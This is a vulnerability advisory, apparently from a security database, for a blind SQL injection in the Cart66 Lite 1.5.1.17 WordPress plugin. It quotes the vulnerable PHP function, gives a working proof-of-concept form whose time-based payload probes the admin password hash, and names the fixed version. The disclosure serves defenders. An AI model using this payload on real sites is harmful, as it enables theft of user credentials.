Cart66 Lite WordPress Ecommerce 1.5.1.17 Blind SQL Injection

Published
Credit
Risk
2016.09.24
Kacper Szurek
Medium
CWE
CVE
Local
Remote
CWE-89
CVE-2014-9305
No
Yes

CVSS Base Score
Impact Subscore
Exploitability Subscore
6.5/10
6.4/10
8/10
Exploit range
Attack complexity
Authentication
Remote
Low
Single time
Confidentiality impact
Integrity impact
Availability impact
Partial
Partial
Partial

# Exploit Title: Cart66 Lite WordPress Ecommerce 1.5.1.17 Blind SQL Injection
# Date: 29-10-2014
# Exploit Author: Kacper Szurek - http://security.szurek.pl/ http://twitter.com/KacperSzurek
# Software Link: https://downloads.wordpress.org/plugin/cart66-lite.1.5.1.17.zip
# Category: webapps

1. Description

Cart66Ajax::shortcodeProductsTable() is accessible for every registered user.

$postId is not escaped correctly (only html tags are stripped).

File: cart66-litemodelsCart66Ajax.php
public static function shortcodeProductsTable() {
global $wpdb;
$prices = array();
$types = array();
$postId = Cart66Common::postVal('id');
$product = new Cart66Product();
$products = $product->getModels("where id=$postId", "order by name");
$data = array();
}

http://security.szurek.pl/cart66-lite-wordpress-ecommerce-15117-blind-sql-injection.html

2. Proof of Concept

Login as regular user (created using wp-login.php?action=register):

<form action="http://wordpress-install/wp-admin/admin-ajax.php" method="post">
<input type="hidden" name="action" value="shortcode_products_table">
Blind SQL Injection: <input type="text" name="id" value="0 UNION (SELECT IF(substr(user_pass,1,1) = CHAR(36), SLEEP(5), 0) FROM wp_users WHERE ID = 1) -- ">
<input value="Hack" type="submit">
</form>

This SQL will check if first password character user ID=1 is $.

If yes, it will sleep 5 seconds.

3. Solution:

Update to version 1.5.2
https://wordpress.org/plugins/cart66-lite/changelog/
https://downloads.wordpress.org/plugin/cart66-lite.1.5.2.zip

References:

https://wordpress.org/plugins/cart66-lite/changelog/
https://downloads.wordpress.org/plugin/cart66-lite.1.5.2.zip


See this note in RAW Version

 
Bugtraq RSS
Bugtraq
 
CVE RSS
CVEMAP
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn


Copyright 2017, cxsecurity.com